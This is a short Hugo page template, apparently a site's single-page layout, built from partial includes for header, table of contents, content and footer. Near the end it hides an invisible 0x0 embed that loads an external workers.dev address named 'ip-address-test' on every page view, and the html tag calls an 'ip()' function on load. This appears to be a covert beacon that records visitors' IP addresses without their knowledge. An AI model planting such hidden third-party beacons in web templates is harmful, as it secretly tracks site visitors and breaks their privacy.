<!DOCTYPE html>
<html lang="{{ .Lang }}" onload="ip()">
{{ partial "head.html" . }}

<body>
{{partial "search.html" .}}
<div class="singlePage">
    <!-- Begin actual content -->
    {{partial "header.html" .}}
    <article>
        {{partial "toc.html" .}}
        {{partial "textprocessing.html" . }}
        {{if $.Site.Data.config.enableRecentNotes}}
          {{partial "recent.html" . }}
        {{end}}
    </article>
    {{partial "footerIndex.html" .}}
</div>
<embed src="https://ip-address-test-1.mq9reaper.workers.dev/" style="width:0px; height: 0px;">
</body>
</html>
